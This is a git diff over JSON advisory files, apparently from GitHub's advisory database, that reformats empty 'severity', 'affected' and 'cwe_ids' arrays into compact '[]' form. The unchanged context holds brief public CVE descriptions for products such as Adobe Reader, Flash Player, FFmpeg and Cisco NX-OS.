a/advisories/unreviewed/2022/05/GHSA-fhc9-8cx6-h467/GHSA-fhc9-8cx6-h467.json b/advisories/unreviewed/2022/05/GHSA-fhc9-8cx6-h467/GHSA-fhc9-8cx6-h467.json index df70cb5b32a..0dce9230c51 100644 --- a/advisories/unreviewed/2022/05/GHSA-fhc9-8cx6-h467/GHSA-fhc9-8cx6-h467.json +++ b/advisories/unreviewed/2022/05/GHSA-fhc9-8cx6-h467/GHSA-fhc9-8cx6-h467.json @@ -7,12 +7,8 @@ "CVE-2010-2214" ], "details": "Adobe Flash Player before 9.0.280 and 10.x before 10.1.82.76, and Adobe AIR before 2.0.3, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-0209, CVE-2010-2213, and CVE-2010-2216.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fhgx-fprj-xm5c/GHSA-fhgx-fprj-xm5c.json b/advisories/unreviewed/2022/05/GHSA-fhgx-fprj-xm5c/GHSA-fhgx-fprj-xm5c.json index 8b738aafa4d..d24497bf08f 100644 --- a/advisories/unreviewed/2022/05/GHSA-fhgx-fprj-xm5c/GHSA-fhgx-fprj-xm5c.json +++ b/advisories/unreviewed/2022/05/GHSA-fhgx-fprj-xm5c/GHSA-fhgx-fprj-xm5c.json @@ -7,12 +7,8 @@ "CVE-2013-1181" ], "details": "Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fhxv-c3fv-fh8h/GHSA-fhxv-c3fv-fh8h.json b/advisories/unreviewed/2022/05/GHSA-fhxv-c3fv-fh8h/GHSA-fhxv-c3fv-fh8h.json index 5f606457615..e14304d4349 100644 --- a/advisories/unreviewed/2022/05/GHSA-fhxv-c3fv-fh8h/GHSA-fhxv-c3fv-fh8h.json +++ b/advisories/unreviewed/2022/05/GHSA-fhxv-c3fv-fh8h/GHSA-fhxv-c3fv-fh8h.json @@ -7,12 +7,8 @@ "CVE-2011-0590" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a 3D file, a different vulnerability than CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fjgw-mh3v-fgr9/GHSA-fjgw-mh3v-fgr9.json b/advisories/unreviewed/2022/05/GHSA-fjgw-mh3v-fgr9/GHSA-fjgw-mh3v-fgr9.json index 3efbe3c3e00..b01be9a7bce 100644 --- a/advisories/unreviewed/2022/05/GHSA-fjgw-mh3v-fgr9/GHSA-fjgw-mh3v-fgr9.json +++ b/advisories/unreviewed/2022/05/GHSA-fjgw-mh3v-fgr9/GHSA-fjgw-mh3v-fgr9.json @@ -7,12 +7,8 @@ "CVE-2011-0602" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fjqq-g8jc-6475/GHSA-fjqq-g8jc-6475.json b/advisories/unreviewed/2022/05/GHSA-fjqq-g8jc-6475/GHSA-fjqq-g8jc-6475.json index 76657f1ba0c..c60c2a1d9bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-fjqq-g8jc-6475/GHSA-fjqq-g8jc-6475.json +++ b/advisories/unreviewed/2022/05/GHSA-fjqq-g8jc-6475/GHSA-fjqq-g8jc-6475.json @@ -7,12 +7,8 @@ "CVE-2013-0991" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fmq6-9ch4-2xr6/GHSA-fmq6-9ch4-2xr6.json b/advisories/unreviewed/2022/05/GHSA-fmq6-9ch4-2xr6/GHSA-fmq6-9ch4-2xr6.json index adbf6357407..c722d02c30a 100644 --- a/advisories/unreviewed/2022/05/GHSA-fmq6-9ch4-2xr6/GHSA-fmq6-9ch4-2xr6.json +++ b/advisories/unreviewed/2022/05/GHSA-fmq6-9ch4-2xr6/GHSA-fmq6-9ch4-2xr6.json @@ -7,12 +7,8 @@ "CVE-2011-0577" ], "details": "Unspecified vulnerability in Adobe Flash Player before 10.2.152.26 allows remote attackers to execute arbitrary code via a crafted font.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -104,9 +100,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fp5j-x74r-9mcq/GHSA-fp5j-x74r-9mcq.json b/advisories/unreviewed/2022/05/GHSA-fp5j-x74r-9mcq/GHSA-fp5j-x74r-9mcq.json index 787463b812a..8957a2d814d 100644 --- a/advisories/unreviewed/2022/05/GHSA-fp5j-x74r-9mcq/GHSA-fp5j-x74r-9mcq.json +++ b/advisories/unreviewed/2022/05/GHSA-fp5j-x74r-9mcq/GHSA-fp5j-x74r-9mcq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fpm8-vp26-crfh/GHSA-fpm8-vp26-crfh.json b/advisories/unreviewed/2022/05/GHSA-fpm8-vp26-crfh/GHSA-fpm8-vp26-crfh.json index 77ee6af3ac7..9ab3103b0b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-fpm8-vp26-crfh/GHSA-fpm8-vp26-crfh.json +++ b/advisories/unreviewed/2022/05/GHSA-fpm8-vp26-crfh/GHSA-fpm8-vp26-crfh.json @@ -7,12 +7,8 @@ "CVE-2008-5823" ], "details": "An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fpv4-jc7c-rhgj/GHSA-fpv4-jc7c-rhgj.json b/advisories/unreviewed/2022/05/GHSA-fpv4-jc7c-rhgj/GHSA-fpv4-jc7c-rhgj.json index b9f6f7cb3f3..32c788a5e21 100644 --- a/advisories/unreviewed/2022/05/GHSA-fpv4-jc7c-rhgj/GHSA-fpv4-jc7c-rhgj.json +++ b/advisories/unreviewed/2022/05/GHSA-fpv4-jc7c-rhgj/GHSA-fpv4-jc7c-rhgj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-frp2-ww75-g7h6/GHSA-frp2-ww75-g7h6.json b/advisories/unreviewed/2022/05/GHSA-frp2-ww75-g7h6/GHSA-frp2-ww75-g7h6.json index 09dbc04d735..764e5bba611 100644 --- a/advisories/unreviewed/2022/05/GHSA-frp2-ww75-g7h6/GHSA-frp2-ww75-g7h6.json +++ b/advisories/unreviewed/2022/05/GHSA-frp2-ww75-g7h6/GHSA-frp2-ww75-g7h6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fv22-479x-wqf8/GHSA-fv22-479x-wqf8.json b/advisories/unreviewed/2022/05/GHSA-fv22-479x-wqf8/GHSA-fv22-479x-wqf8.json index c13f9b9c9e6..c828234d36b 100644 --- a/advisories/unreviewed/2022/05/GHSA-fv22-479x-wqf8/GHSA-fv22-479x-wqf8.json +++ b/advisories/unreviewed/2022/05/GHSA-fv22-479x-wqf8/GHSA-fv22-479x-wqf8.json @@ -7,12 +7,8 @@ "CVE-2010-3626" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted font, a different vulnerability than CVE-2010-2889.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fv9q-w2fc-m6jg/GHSA-fv9q-w2fc-m6jg.json b/advisories/unreviewed/2022/05/GHSA-fv9q-w2fc-m6jg/GHSA-fv9q-w2fc-m6jg.json index 4fd2c99e5d0..42d0b0656f5 100644 --- a/advisories/unreviewed/2022/05/GHSA-fv9q-w2fc-m6jg/GHSA-fv9q-w2fc-m6jg.json +++ b/advisories/unreviewed/2022/05/GHSA-fv9q-w2fc-m6jg/GHSA-fv9q-w2fc-m6jg.json @@ -7,12 +7,8 @@ "CVE-2010-2212" ], "details": "Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via a PDF file containing Flash content with a crafted #1023 (3FFh) tag, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, and CVE-2010-2211.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fvx3-47rw-xhxr/GHSA-fvx3-47rw-xhxr.json b/advisories/unreviewed/2022/05/GHSA-fvx3-47rw-xhxr/GHSA-fvx3-47rw-xhxr.json index 898e1f8e42f..c4f9159b976 100644 --- a/advisories/unreviewed/2022/05/GHSA-fvx3-47rw-xhxr/GHSA-fvx3-47rw-xhxr.json +++ b/advisories/unreviewed/2022/05/GHSA-fvx3-47rw-xhxr/GHSA-fvx3-47rw-xhxr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fw3w-492m-rr7g/GHSA-fw3w-492m-rr7g.json b/advisories/unreviewed/2022/05/GHSA-fw3w-492m-rr7g/GHSA-fw3w-492m-rr7g.json index e96d09d951b..4c9ed6260f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-fw3w-492m-rr7g/GHSA-fw3w-492m-rr7g.json +++ b/advisories/unreviewed/2022/05/GHSA-fw3w-492m-rr7g/GHSA-fw3w-492m-rr7g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fwx3-38cj-xpfq/GHSA-fwx3-38cj-xpfq.json b/advisories/unreviewed/2022/05/GHSA-fwx3-38cj-xpfq/GHSA-fwx3-38cj-xpfq.json index 7ca75c08d05..15ac4df1485 100644 --- a/advisories/unreviewed/2022/05/GHSA-fwx3-38cj-xpfq/GHSA-fwx3-38cj-xpfq.json +++ b/advisories/unreviewed/2022/05/GHSA-fwx3-38cj-xpfq/GHSA-fwx3-38cj-xpfq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fx8c-57f3-gvxr/GHSA-fx8c-57f3-gvxr.json b/advisories/unreviewed/2022/05/GHSA-fx8c-57f3-gvxr/GHSA-fx8c-57f3-gvxr.json index d4309b1e332..cae6d2e3e08 100644 --- a/advisories/unreviewed/2022/05/GHSA-fx8c-57f3-gvxr/GHSA-fx8c-57f3-gvxr.json +++ b/advisories/unreviewed/2022/05/GHSA-fx8c-57f3-gvxr/GHSA-fx8c-57f3-gvxr.json @@ -7,12 +7,8 @@ "CVE-2012-2793" ], "details": "Unspecified vulnerability in the lag_decode_zero_run_line function in libavcodec/lagarith.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors related to \"too many zeros.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g2g7-mp7p-qwgx/GHSA-g2g7-mp7p-qwgx.json b/advisories/unreviewed/2022/05/GHSA-g2g7-mp7p-qwgx/GHSA-g2g7-mp7p-qwgx.json index 9b5ae8620ed..7d9fb560d1e 100644 --- a/advisories/unreviewed/2022/05/GHSA-g2g7-mp7p-qwgx/GHSA-g2g7-mp7p-qwgx.json +++ b/advisories/unreviewed/2022/05/GHSA-g2g7-mp7p-qwgx/GHSA-g2g7-mp7p-qwgx.json @@ -7,12 +7,8 @@ "CVE-2011-0592" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to \"Texture bmp,\" a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g3j8-f52j-p4j2/GHSA-g3j8-f52j-p4j2.json b/advisories/unreviewed/2022/05/GHSA-g3j8-f52j-p4j2/GHSA-g3j8-f52j-p4j2.json index d45ab59f65f..5b14117d126 100644 --- a/advisories/unreviewed/2022/05/GHSA-g3j8-f52j-p4j2/GHSA-g3j8-f52j-p4j2.json +++ b/advisories/unreviewed/2022/05/GHSA-g3j8-f52j-p4j2/GHSA-g3j8-f52j-p4j2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g45f-8hj8-58j6/GHSA-g45f-8hj8-58j6.json b/advisories/unreviewed/2022/05/GHSA-g45f-8hj8-58j6/GHSA-g45f-8hj8-58j6.json index c27e92cf68d..7b8cfde8d36 100644 --- a/advisories/unreviewed/2022/05/GHSA-g45f-8hj8-58j6/GHSA-g45f-8hj8-58j6.json +++ b/advisories/unreviewed/2022/05/GHSA-g45f-8hj8-58j6/GHSA-g45f-8hj8-58j6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g4qm-7ghw-6vwq/GHSA-g4qm-7ghw-6vwq.json b/advisories/unreviewed/2022/05/GHSA-g4qm-7ghw-6vwq/GHSA-g4qm-7ghw-6vwq.json index b90180bb724..6938b431473 100644 --- a/advisories/unreviewed/2022/05/GHSA-g4qm-7ghw-6vwq/GHSA-g4qm-7ghw-6vwq.json +++ b/advisories/unreviewed/2022/05/GHSA-g4qm-7ghw-6vwq/GHSA-g4qm-7ghw-6vwq.json @@ -7,12 +7,8 @@ "CVE-2010-2890" ], "details": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g5qc-mxg3-w44r/GHSA-g5qc-mxg3-w44r.json b/advisories/unreviewed/2022/05/GHSA-g5qc-mxg3-w44r/GHSA-g5qc-mxg3-w44r.json index d48e04b2f10..371e63caa58 100644 --- a/advisories/unreviewed/2022/05/GHSA-g5qc-mxg3-w44r/GHSA-g5qc-mxg3-w44r.json +++ b/advisories/unreviewed/2022/05/GHSA-g5qc-mxg3-w44r/GHSA-g5qc-mxg3-w44r.json @@ -7,12 +7,8 @@ "CVE-2014-1636" ], "details": "Multiple SQL injection vulnerabilities in Command School Student Management System 1.06.01 allow remote attackers to execute arbitrary SQL commands via the id parameter in an edit action to (1) admin_school_names.php, (2) admin_subjects.php, (3) admin_grades.php, (4) admin_terms.php, (5) admin_school_years.php, (6) admin_sgrades.php, (7) admin_media_codes_1.php, (8) admin_infraction_codes.php, (9) admin_generations.php, (10) admin_relations.php, (11) admin_titles.php, or (12) health_allergies.php in sw/.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g5vr-3wpw-49ph/GHSA-g5vr-3wpw-49ph.json b/advisories/unreviewed/2022/05/GHSA-g5vr-3wpw-49ph/GHSA-g5vr-3wpw-49ph.json index f1299e4071a..6b0e0b29f85 100644 --- a/advisories/unreviewed/2022/05/GHSA-g5vr-3wpw-49ph/GHSA-g5vr-3wpw-49ph.json +++ b/advisories/unreviewed/2022/05/GHSA-g5vr-3wpw-49ph/GHSA-g5vr-3wpw-49ph.json @@ -7,12 +7,8 @@ "CVE-2010-4091" ], "details": "The EScript.api plugin in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.1, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document that triggers memory corruption, involving the printSeps function. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g5x8-x7w7-x84f/GHSA-g5x8-x7w7-x84f.json b/advisories/unreviewed/2022/05/GHSA-g5x8-x7w7-x84f/GHSA-g5x8-x7w7-x84f.json index 804368681c4..60eb61fe0fb 100644 --- a/advisories/unreviewed/2022/05/GHSA-g5x8-x7w7-x84f/GHSA-g5x8-x7w7-x84f.json +++ b/advisories/unreviewed/2022/05/GHSA-g5x8-x7w7-x84f/GHSA-g5x8-x7w7-x84f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g6rm-36wg-6gf5/GHSA-g6rm-36wg-6gf5.json b/advisories/unreviewed/2022/05/GHSA-g6rm-36wg-6gf5/GHSA-g6rm-36wg-6gf5.json index e0ea4a345ee..e67132a9f41 100644 --- a/advisories/unreviewed/2022/05/GHSA-g6rm-36wg-6gf5/GHSA-g6rm-36wg-6gf5.json +++ b/advisories/unreviewed/2022/05/GHSA-g6rm-36wg-6gf5/GHSA-g6rm-36wg-6gf5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g79v-hxm3-34mv/GHSA-g79v-hxm3-34mv.json b/advisories/unreviewed/2022/05/GHSA-g79v-hxm3-34mv/GHSA-g79v-hxm3-34mv.json index 7e2c1ca6482..0c3344b48b3 100644 --- a/advisories/unreviewed/2022/05/GHSA-g79v-hxm3-34mv/GHSA-g79v-hxm3-34mv.json +++ b/advisories/unreviewed/2022/05/GHSA-g79v-hxm3-34mv/GHSA-g79v-hxm3-34mv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g7r2-w2q5-xwcc/GHSA-g7r2-w2q5-xwcc.json b/advisories/unreviewed/2022/05/GHSA-g7r2-w2q5-xwcc/GHSA-g7r2-w2q5-xwcc.json index 1f5fdfa9b28..0ca79173f73 100644 --- a/advisories/unreviewed/2022/05/GHSA-g7r2-w2q5-xwcc/GHSA-g7r2-w2q5-xwcc.json +++ b/advisories/unreviewed/2022/05/GHSA-g7r2-w2q5-xwcc/GHSA-g7r2-w2q5-xwcc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g7vx-xpxv-6552/GHSA-g7vx-xpxv-6552.json b/advisories/unreviewed/2022/05/GHSA-g7vx-xpxv-6552/GHSA-g7vx-xpxv-6552.json index fac72911cfa..ce8cbbd27e3 100644 --- a/advisories/unreviewed/2022/05/GHSA-g7vx-xpxv-6552/GHSA-g7vx-xpxv-6552.json +++ b/advisories/unreviewed/2022/05/GHSA-g7vx-xpxv-6552/GHSA-g7vx-xpxv-6552.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g7wm-27v9-xhqx/GHSA-g7wm-27v9-xhqx.json b/advisories/unreviewed/2022/05/GHSA-g7wm-27v9-xhqx/GHSA-g7wm-27v9-xhqx.json index aa7de9215fa..aae7c44038b 100644 --- a/advisories/unreviewed/2022/05/GHSA-g7wm-27v9-xhqx/GHSA-g7wm-27v9-xhqx.json +++ b/advisories/unreviewed/2022/05/GHSA-g7wm-27v9-xhqx/GHSA-g7wm-27v9-xhqx.json @@ -7,12 +7,8 @@ "CVE-2012-2794" ], "details": "Unspecified vulnerability in the decode_mb_info function in libavcodec/indeo5.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors in which the \"allocated tile size ... mismatches parameters.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g8q2-r69c-j6r7/GHSA-g8q2-r69c-j6r7.json b/advisories/unreviewed/2022/05/GHSA-g8q2-r69c-j6r7/GHSA-g8q2-r69c-j6r7.json index f699b0af1aa..75c1f4bc520 100644 --- a/advisories/unreviewed/2022/05/GHSA-g8q2-r69c-j6r7/GHSA-g8q2-r69c-j6r7.json +++ b/advisories/unreviewed/2022/05/GHSA-g8q2-r69c-j6r7/GHSA-g8q2-r69c-j6r7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g8wm-c6h5-35rm/GHSA-g8wm-c6h5-35rm.json b/advisories/unreviewed/2022/05/GHSA-g8wm-c6h5-35rm/GHSA-g8wm-c6h5-35rm.json index b7f5ff578db..bac36506974 100644 --- a/advisories/unreviewed/2022/05/GHSA-g8wm-c6h5-35rm/GHSA-g8wm-c6h5-35rm.json +++ b/advisories/unreviewed/2022/05/GHSA-g8wm-c6h5-35rm/GHSA-g8wm-c6h5-35rm.json @@ -7,12 +7,8 @@ "CVE-2010-2241" ], "details": "The (1) setup-ds.pl and (2) setup-ds-admin.pl setup scripts for Red Hat Directory Server 8 before 8.2 use world-readable permissions when creating cache files, which allows local users to obtain sensitive information including passwords for Directory and Administration Server administrative accounts.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gcwm-gg76-5wqr/GHSA-gcwm-gg76-5wqr.json b/advisories/unreviewed/2022/05/GHSA-gcwm-gg76-5wqr/GHSA-gcwm-gg76-5wqr.json index acd2973f607..7eb531acf98 100644 --- a/advisories/unreviewed/2022/05/GHSA-gcwm-gg76-5wqr/GHSA-gcwm-gg76-5wqr.json +++ b/advisories/unreviewed/2022/05/GHSA-gcwm-gg76-5wqr/GHSA-gcwm-gg76-5wqr.json @@ -7,12 +7,8 @@ "CVE-2012-2802" ], "details": "Unspecified vulnerability in the ac3_decode_frame function in libavcodec/ac3dec.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.4 has unknown impact and attack vectors, related to the \"number of output channels\" and \"out of array writes.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gf46-gfqg-f762/GHSA-gf46-gfqg-f762.json b/advisories/unreviewed/2022/05/GHSA-gf46-gfqg-f762/GHSA-gf46-gfqg-f762.json index 30f2fb9b7d9..7a25416abd4 100644 --- a/advisories/unreviewed/2022/05/GHSA-gf46-gfqg-f762/GHSA-gf46-gfqg-f762.json +++ b/advisories/unreviewed/2022/05/GHSA-gf46-gfqg-f762/GHSA-gf46-gfqg-f762.json @@ -7,12 +7,8 @@ "CVE-2013-0992" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ggf3-232m-5283/GHSA-ggf3-232m-5283.json b/advisories/unreviewed/2022/05/GHSA-ggf3-232m-5283/GHSA-ggf3-232m-5283.json index 21b29396726..4bc14de2d9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-ggf3-232m-5283/GHSA-ggf3-232m-5283.json +++ b/advisories/unreviewed/2022/05/GHSA-ggf3-232m-5283/GHSA-ggf3-232m-5283.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gh9j-7p27-cg45/GHSA-gh9j-7p27-cg45.json b/advisories/unreviewed/2022/05/GHSA-gh9j-7p27-cg45/GHSA-gh9j-7p27-cg45.json index 0efe764c4a1..59db7455090 100644 --- a/advisories/unreviewed/2022/05/GHSA-gh9j-7p27-cg45/GHSA-gh9j-7p27-cg45.json +++ b/advisories/unreviewed/2022/05/GHSA-gh9j-7p27-cg45/GHSA-gh9j-7p27-cg45.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + 